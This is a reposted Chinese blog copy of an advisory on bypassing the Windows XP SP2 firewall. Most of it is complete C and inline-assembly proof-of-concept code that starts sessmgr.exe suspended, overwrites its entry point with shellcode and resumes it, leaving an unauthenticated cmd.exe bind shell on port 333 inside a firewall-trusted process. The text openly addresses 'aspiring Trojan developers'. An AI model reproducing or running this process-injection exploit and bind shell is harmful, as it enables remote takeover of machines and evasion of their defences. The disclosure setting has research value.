[转贴]绕过xp sp2防火墙的代码

转载 2004年10月26日 20:17:00

绕过xp sp2防火墙的代码 
 
 Summary

Windows XP Service Pack 2 incorporates many enhancements intended to better protect systems from malware and other forms of attack. One of those layers of protection is the Windows XP SP2 Firewall, and one of its features is letting users decide which applications may listen on the network. By allowing users to control which applications can communicate on the network, Microsoft suggests that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate: the firewall's exceptions are tied to which executable image a listener lives in, so code that is already executing locally can simply place its listener inside a process the firewall trusts and bypass the Windows Firewall without any extra privilege. So don't worry, you aspiring Trojan developers — you're still going to be able to Trojan consumer and corporate systems to your heart's content.

Attached to this advisory is proof-of-concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the trust the firewall places in sessmgr.exe: it starts sessmgr.exe suspended, overwrites the program's entry point with a small bind-shell stub, and resumes it, so the listener appears to belong to sessmgr.exe. Simply compile this program and run it as any local user. To test whether the Firewall has been bypassed (it is!), telnet from another machine to the target machine on port 333; if you are connected, you have successfully bypassed the Windows XP Service Pack 2 Firewall. Be aware of what answers on that port: the stub launches cmd.exe with its standard input/output/error attached to the accepted socket, i.e. an unauthenticated command shell running as whoever launched the program, so run this only on an isolated test host.


Details
Exploit:
#include <windows.h>
#include <winsock.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

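/*
 * Patch one "mov eax, imm32" placeholder inside a copied shellcode buffer.
 *
 * Scans buffer[0..sz) for the opcode byte 0xB8 (mov eax, imm32) whose
 * 32-bit immediate equals `from`, and overwrites that immediate with `fp`.
 * Only the first match is patched; later occurrences are left alone.
 *
 * The immediate is read and written with memcpy so that the unaligned access
 * is well-defined; the byte order is the host's, which is what the stub needs
 * since it executes on the same machine.  The opcode is compared as an
 * unsigned byte so the signedness of `char` does not matter.
 *
 * buffer - shellcode bytes, modified in place
 * sz     - number of valid bytes in buffer; anything below 5 patches nothing
 * from   - placeholder immediate to look for (e.g. 0x11111111)
 * fp     - real function address to substitute
 */
void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
    int i;
    DWORD imm;

    /* A candidate needs the opcode byte plus 4 immediate bytes inside the
       buffer, i.e. i + 5 <= sz.  (The original bound, i < sz - 5, could never
       match a placeholder ending exactly at the last byte.) */
    for (i = 0; i + 5 <= sz; i++) {
        if ((unsigned char)buffer[i] != 0xB8)
            continue;
        memcpy(&imm, buffer + i + 1, sizeof imm);
        if (imm == from) {
            memcpy(buffer + i + 1, &fp, sizeof fp);
            break;
        }
    }
}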

/*
 * Build the position-independent bind-shell stub that main() writes over the
 * target's entry point, and patch the real API addresses into it.
 *
 * The stub is the inline-asm block between `call over` and `over:`.  It is
 * never executed in this process: `call over` jumps straight past it and the
 * `pop eax` at `over:` recovers the pushed return address, which is the
 * address of the stub's first byte.  Copied out, the stub does, in order:
 *   LoadLibraryA("ws2_32"); WSAStartup(0x101, &wsadata);
 *   s = WSASocketA(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
 *   bind(s, {AF_INET, port 333, INADDR_ANY}, 16); listen(s, SOMAXCONN);
 *   c = accept(s, NULL, NULL);
 *   CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
 *     with si.hStdInput/hStdOutput/hStdError all equal to c;
 *   Sleep(INFINITE).
 * Every API call is "mov eax, 0xNNNNNNNN / call eax"; the placeholder
 * immediates are replaced by setfp() after the copy, which is what lets the
 * same bytes run in another process at another address.
 *
 * The addresses are resolved here, in the injecting process.  NOTE(review):
 * they are only meaningful in the target if kernel32 and ws2_32 load at the
 * same base in both processes; the code assumes that and does not verify it.
 * Nor are LoadLibrary/GetProcAddress failures checked: a NULL would be patched
 * in and the stub would fault on the corresponding `call eax`.
 *
 * buffer - caller-supplied output, must hold at least 0xA0 bytes.
 * Returns the number of bytes copied (the hard-coded 0xA0).  NOTE(review):
 * this constant is presumably the assembled distance from the first stub
 * instruction to `over:`; nothing checks it, so it must be kept in sync with
 * the asm by hand.
 */
int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
/* Load ws2_32 locally so its exports can be resolved with GetProcAddress. */
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over                /* push the address of the stub's first byte, skip the stub */

/* LoadLibraryA("ws2_32"): the two pushes lay out "ws2_32\0\0" on the stack */
push '23'
push '_2sw'
push esp
mov eax,0x11111111       /* -> LoadLibraryA (patched by setfp) */
call eax

/* WSAStartup(0x101, &wsadata): 0x64 zero DWORDs = 400 bytes for the WSADATA */
xor ebx,ebx              /* ebx stays 0 for the rest of the stub */
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333       /* -> WSAStartup */
call eax

/* esi = WSASocketA(AF_INET, SOCK_STREAM, 0, NULL, 0, 0) */
push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444       /* -> WSASocketA */
call eax
mov esi,eax

/* bind(esi, &sockaddr_in, 16): three zero DWORDs then, in memory,
   02 00 4D 01 = sin_family AF_INET, sin_port htons(333); sin_addr is 0 (any) */
push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555       /* -> bind */
call eax

/* listen(esi, SOMAXCONN) */
push SOMAXCONN
push esi
mov eax,0x66666666       /* -> listen */
call eax

/* edi = accept(esi, NULL, NULL); blocks until a client connects */
push ebx
push ebx
push esi
mov eax,0x77777777       /* -> accept */
call eax
mov edi,eax

/* PROCESS_INFORMATION: four zero DWORDs, eax = &pi */
push ebx
push ebx
push ebx
push ebx
mov eax,esp
/* STARTUPINFO built back to front: hStdError/hStdOutput/hStdInput = the
   accepted socket, lpReserved2 = 0, wShowWindow:cbReserved2 = SW_HIDE,
   dwFlags = STARTF_USESTDHANDLES, ten zero DWORDs (dwFillAttribute back to
   lpReserved), cb = 0x44 (68 bytes); ecx = &si */
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'               /* "cmd\0" on the stack, edx = command line */
mov edx, esp

/* CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
   bInheritHandles = 1 so cmd.exe inherits the socket as its std handles */
push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222       /* -> CreateProcessA */
call eax

/* Sleep(INFINITE): the stub never returns, so the host process just idles */
push INFINITE
mov eax,0x88888888       /* -> Sleep */
call eax

over:
pop eax                  /* return address pushed by `call over` = stub start */
mov code,eax
}

/* Hard-coded stub length; see the NOTE in the header comment. */
len=0xA0;
memcpy(buffer,code,len);
/* Replace each placeholder immediate with the address resolved above. */
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

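/*
 * Entry point.  Launches <system dir>\sessmgr.exe suspended, walks the new
 * thread's FS selector to its TEB and PEB to find the image base, overwrites
 * the PE entry point with the stub from injcode(), and resumes the thread so
 * the bind shell runs inside a process image the SP2 firewall already trusts.
 *
 * Returns 0 once the target has been resumed, 1 on any failure.  A target that
 * was created but could not be patched is terminated instead of being left
 * suspended, and both process handles are always closed.
 *
 * 32-bit x86 only: the TEB (+0x30 = PEB) and PEB (+0x08 = ImageBaseAddress)
 * offsets, the selector walk and the inline asm in injcode() all assume it.
 */
int main(void)
{
    STARTUPINFO sinfo;
    PROCESS_INFORMATION pinfo;
    CONTEXT context;
    LDT_ENTRY sel;
    DWORD done, oldprot, tib, peb, exebase, peoffs, ep;
    UINT dirlen;
    IMAGE_NT_HEADERS pehdr;
    int len;
    char sessmgr[MAX_PATH+13];   /* system dir (< MAX_PATH) + "\sessmgr.exe" + NUL */
    char buffer[2048];
    int rc = 1;

    /* GetSystemDirectory returns 0 on failure and the size it would need when
       the buffer is too small; both leave sessmgr unusable. */
    dirlen = GetSystemDirectory(sessmgr, MAX_PATH);
    if (dirlen == 0 || dirlen >= MAX_PATH) {
        fprintf(stderr, "GetSystemDirectory failed (%lu)\n", GetLastError());
        return 1;
    }
    strcat(sessmgr, "\\sessmgr.exe");   /* dirlen <= MAX_PATH-1, so this fits */

    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    memset(&pinfo, 0, sizeof(pinfo));

    /* CREATE_SUSPENDED: the primary thread has not executed an instruction yet,
       so the entry point can be replaced before it ever runs. */
    if (!CreateProcess(sessmgr, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
                       NULL, NULL, &sinfo, &pinfo)) {
        fprintf(stderr, "CreateProcess(%s) failed (%lu)\n", sessmgr, GetLastError());
        return 1;
    }

    /* Resolve the new thread's FS selector to the linear address of its TEB. */
    context.ContextFlags = CONTEXT_FULL;
    if (!GetThreadContext(pinfo.hThread, &context) ||
        !GetThreadSelectorEntry(pinfo.hThread, context.SegFs, &sel)) {
        fprintf(stderr, "GetThreadContext/GetThreadSelectorEntry failed (%lu)\n", GetLastError());
        goto fail;
    }
    /* Casts keep the shifts in unsigned arithmetic (BaseHi << 24 overflows int). */
    tib = (DWORD)sel.BaseLow
        | ((DWORD)sel.HighWord.Bytes.BaseMid << 16)
        | ((DWORD)sel.HighWord.Bytes.BaseHi << 24);

    /* TEB+0x30 -> PEB, PEB+0x08 -> ImageBaseAddress, base+0x3C -> e_lfanew. */
    if (!ReadProcessMemory(pinfo.hProcess, (LPCVOID)(tib + 0x30), &peb, 4, &done) ||
        !ReadProcessMemory(pinfo.hProcess, (LPCVOID)(peb + 0x08), &exebase, 4, &done) ||
        !ReadProcessMemory(pinfo.hProcess, (LPCVOID)(exebase + 0x3C), &peoffs, 4, &done) ||
        !ReadProcessMemory(pinfo.hProcess, (LPCVOID)(exebase + peoffs), &pehdr, sizeof(pehdr), &done)) {
        fprintf(stderr, "ReadProcessMemory failed (%lu)\n", GetLastError());
        goto fail;
    }
    if (pehdr.Signature != IMAGE_NT_SIGNATURE) {
        fprintf(stderr, "no PE header at e_lfanew; refusing to patch\n");
        goto fail;
    }
    ep = exebase + pehdr.OptionalHeader.AddressOfEntryPoint;

    len = injcode(buffer);

    /* The original called VirtualProtect(), which acts on THIS process, where
       ep is not mapped, and so silently did nothing; the target's page has to
       be changed with VirtualProtectEx.  WriteProcessMemory normally re-protects
       a read-only page on its own, which is presumably why the mistake went
       unnoticed, but that is not something to rely on. */
    if (!VirtualProtectEx(pinfo.hProcess, (LPVOID)ep, len, PAGE_EXECUTE_READWRITE, &oldprot)) {
        fprintf(stderr, "VirtualProtectEx failed (%lu)\n", GetLastError());
        goto fail;
    }
    if (!WriteProcessMemory(pinfo.hProcess, (LPVOID)ep, buffer, len, &done) || done != (DWORD)len) {
        fprintf(stderr, "WriteProcessMemory failed (%lu)\n", GetLastError());
        goto fail;
    }
    /* A no-op on x86, but the API contract asks for it after writing code. */
    FlushInstructionCache(pinfo.hProcess, (LPCVOID)ep, len);

    if (ResumeThread(pinfo.hThread) == (DWORD)-1) {
        fprintf(stderr, "ResumeThread failed (%lu)\n", GetLastError());
        goto fail;
    }
    rc = 0;
    goto out;

fail:
    /* Do not leave a half-patched, suspended sessmgr.exe lying around. */
    TerminateProcess(pinfo.hProcess, 1);
out:
    CloseHandle(pinfo.hThread);
    CloseHandle(pinfo.hProcess);
    return rc;
}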
